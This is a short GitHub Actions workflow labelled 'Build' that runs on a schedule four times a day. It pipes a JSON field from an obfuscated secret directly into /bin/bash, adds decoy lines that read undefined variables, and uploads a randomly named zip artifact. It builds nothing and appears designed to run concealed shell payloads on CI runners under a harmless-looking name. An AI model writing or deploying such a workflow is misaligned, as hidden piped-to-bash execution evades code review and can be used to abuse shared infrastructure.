name: Build
on:
  workflow_dispatch:

  schedule:
    - cron: '6 1,7,13,19 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Execute
        env:
          gir0: ${{ secrets.gir0 }}
        run: |
          printf '%s' "$gir0" | jq -r .ht8457 | /bin/bash
          echo $zdonz490 | jq -r .h415 | /bin/bash
          printf '%s' "$zj34" | jq -r .i99 | /bin/bash
          printf '%s' "$ou7" | jq -r .sv5938 | /bin/bash

      - name: Upload artifact
        uses: actions/upload-artifact@v4
        with:
          name: 9iIgsWYK
          path: "*.zip"
          retention-days: 1
